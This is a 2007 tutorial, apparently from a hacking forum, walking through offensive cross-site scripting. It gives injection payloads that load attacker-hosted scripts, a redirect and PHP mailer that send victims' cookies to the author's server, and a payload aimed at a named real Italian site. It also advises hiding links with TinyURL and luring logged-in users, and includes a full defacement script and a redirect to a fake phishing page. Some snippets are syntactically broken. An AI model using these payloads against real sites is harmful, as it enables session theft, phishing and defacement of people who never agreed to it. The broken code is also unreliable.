XSS Guide - Part 2

-------------------------------
Author: Langy
Data: 11-09-2007
Copyright: http://www.googlebig.com
-------------------------------

Links:
http://www.gnucitizen.org/xssdb/application.htm (Attack Database)
http://www.xssed.com (Mirror Archive of Vulnerable Websites)
http://ha.ckers.org/xss.html (XSS Cheat sheet)
http://software.graflex.org/dexss/ (Removing JavaScript from HTML)

http://en.wikipedia.org/wiki/Cross-site_scripting

-------------------------------

At this time we need to know the victim cookie and then comes in a "cookie grabbers". Cookie grabber is a script that stay on our server and it include into website url to send us cookies directly by the victim

Howto include a javascript file:

Code:
Code:
"><script src="http://www.googlebig.com/cookiescript.js"></script>
Into cookiescript.js we will write a code that displays the cookie and sends it by email.

First of all we need to create a redirect to our site including the variable of cookies.

then:

Code:
Code:
<script>location.href="http://googlebig.com/cookie.php?cookie=</script>
Now we create cookie.php

Code:
Code:
<? mail("admin@googlebig.com","Here s the cookie stolen",$_GET['cookie']; ?>
Now upload cookie.php and cookiescript.js on our server and then go to:

Code:
Code:
http://www.seap-puglia.it/default.as...a=2&strRicerca
1="><script src="http://www.googlebig.com/cookiescript.js"></script>
If everything works we will receiving cookie by email.

Now we send link to victim...we can send extended link or use a redirect service like http://www.tinyurl.com

Once created redirect, in this case http://tinyurl.com/2rgry5 , we can contact user, possibly through the same site to make sure that it open the link when it's is logged on the site.

XSS THAT DOESN'T WORK

If a xss does not work and therefore do not have the chance of a redirect or not displaying cookies, it can be used as a phishing page.

An example of code is:

Code:
PHP Code:
var title = "XSSED BY GOOGLEBIG.COM";var bgcolor = "#000000";
var image_url = "http://www.googlebig.com/googlebig.jpg";
var text = "Langy was here ;)";var font_color = "#FFFFFF";
deface(title, bgcolor, image_url, text, font_color); 
function deface(pageTitle, bgColor, imageUrl, pageText, fontColor) 
{  document.title = pageTitle; 
 document.body.innerHTML = '';  
document.bgColor = bgColor;  
var overLay = document.createElement("div");  
overLay.style.textAlign = 'center';  
document.body.appendChild(overLay);  
var txt = document.createElement("p");  
txt.style.font = 'normal normal bold 36px Verdana';  
txt.style.color = fontColor;  txt.innerHTML = pageText;  
overLay.appendChild(txt);   
if (image_url != "") {    var newImg = document.createElement("img");    
newImg.setAttribute("border", '0');
newImg.setAttribute("src", imageUrl);    
overLay.appendChild(newImg);  }  
var footer = document.createElement("p");  
footer.style.font = 'italic normal normal 12px Arial';  
footer.style.color = '#DDDDDD';  footer.innerHTML = title;  
overLay.appendChild(footer);}
This code must be entered in this way:

Code:
Code:
http://[Sitevictim]/page.php?variable="><script src="http://www.googlebig.com/script.js"></script>
In this way we will see javascript that we created.

Even in this case we can rely on tinyurl to mask our complete url and include directly redirect.

Code:
Code:
http://[Sitevictim]/page.php?variable="><script src="http://tinyurl.com/xxxxx"></script>
Another way to bring the victim on the page that we want is this:

Code:
Code:
http://[Sitevictim]/page.php?variable="><script>
location.href="http://www.googlebig.com/fakepage.htm</script>
This guide was created for information purposes only.

If u have found a xss u must post it here http://www.xssed.com/submit and u must contact the vulnerable site's admin.